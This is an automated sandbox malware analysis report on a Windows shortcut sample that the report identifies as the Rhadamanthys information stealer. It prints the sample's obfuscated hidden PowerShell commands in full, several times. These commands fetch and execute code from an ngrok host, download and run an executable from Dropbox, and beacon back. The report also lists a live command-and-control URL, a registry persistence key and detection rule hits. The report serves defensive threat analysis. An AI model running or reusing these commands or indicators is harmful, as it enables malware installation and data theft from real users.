Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QhR8Zp6fZs.lnk

Overview

General Information

Sample name:QhR8Zp6fZs.lnk
renamed because original name is a hash value
Original sample name:5e4e0d19fd820dac35ac9d01798e8cc2e7f1fad289c5e5b03fe5bcf72eb072d1.lnk
Analysis ID:1578255
MD5:5081561ebdd155b2ee958ff4f942f700
SHA1:04952608e89cc2df9e2d4b905ac51af6f30f0764
SHA256:5e4e0d19fd820dac35ac9d01798e8cc2e7f1fad289c5e5b03fe5bcf72eb072d1
Tags:Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6716 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6972 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 1436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 7448 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=2152,i,15865133504281396123,895058618401071371,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • cmd.exe (PID: 8772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\749209598.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8924 cmdline: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 1280 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\6d0157c6-3d7d-48ab-8ec3-f1e0d1f3d02e.pdf MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 8828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2144,i,12226870336135791064,6646612057330191858,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
          • 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe (PID: 1596 cmdline: "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe" MD5: F7A506F00E525E6D23AEE43D34219625)
            • 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe (PID: 8812 cmdline: "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe" MD5: F7A506F00E525E6D23AEE43D34219625)
              • fontdrvhost.exe (PID: 5984 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 9048 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 8756 cmdline: C:\Windows\system32\WerFault.exe -u -p 9048 -s 140 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8812 -s 440 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6492 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7312 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2780 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8904 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5296 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8916 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5284 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 9204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 6664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 7548 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7920 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7488 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8232 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8636 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6752 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000022.00000003.2765653273.0000000003420000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000021.00000003.2759520208.00000000029C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000022.00000002.2879586612.0000000003430000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000021.00000002.2772213899.0000000002AD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            33.3.148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.4e70000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              33.3.148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.5090000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                34.3.fontdrvhost.exe.56e0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  34.3.fontdrvhost.exe.54c0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powerup Write Hijack DLL
                    Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6972, TargetFilename: C:\Users\user\AppData\Local\Temp\749209598.bat
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, ProcessId: 1596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nuinsa
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6972, TargetFilename: C:\Users\user\AppData\Local\Temp\749209598.bat
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }", CommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\749209598.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8772, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }", ProcessId: 8924, P
                    Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6716, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), ProcessId: 6972, ProcessName: powershell.exe
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), ProcessId: 6716, ProcessName: cmd.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6716, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing), ProcessId: 6972, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6492, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-19T13:44:25.072195+010028032742Potentially Bad Traffic192.168.2.649749162.125.69.18443TCP
                    2024-12-19T13:44:39.799497+010028032742Potentially Bad Traffic192.168.2.649840162.125.69.18443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-19T13:45:12.849012+010028548021Domain Observed Used for C2 Detected104.161.43.182845192.168.2.649931TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 32.2.148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.5e8a4a.2.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop"}
                    Multi AV Scanner detection for submitted file
                    Source: QhR8Zp6fZs.lnkVirustotal: Detection: 29%Perma Link
                    Source: QhR8Zp6fZs.lnkReversingLabs: Detection: 15%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for sample
                    Source: QhR8Zp6fZs.lnkJoe Sandbox ML: detected

                    Compliance

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeUnpacked PE file: 32.2.148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.4380000.3.unpack
                    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49751 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.6:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49724 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49726 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49783 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49818 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49855 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.6:49874 version: TLS 1.2
                    Source: Binary string: D:\Jenkins\workspace\ccd-app\main\native\win32\build\msvs_win32_x86\Release\x86\sym\AdobeUpdateService\AdobeUpdateService\AdobeUpdateService.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572863734.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000000.2748729244.000000000049E000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: softy.pdb^ source: powershell.exe, 00000016.00000002.2686528755.000001A0BC069000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: softy.pdbll source: powershell.exe, 00000016.00000002.2686528755.000001A0BC069000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2689297753.000001A8BD4B9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2684869746.000001A0BBFB0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763137608.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763301834.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000003.2769045343.00000000054C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ystem.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000016.00000002.2691184239.000001A8BD5C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmp
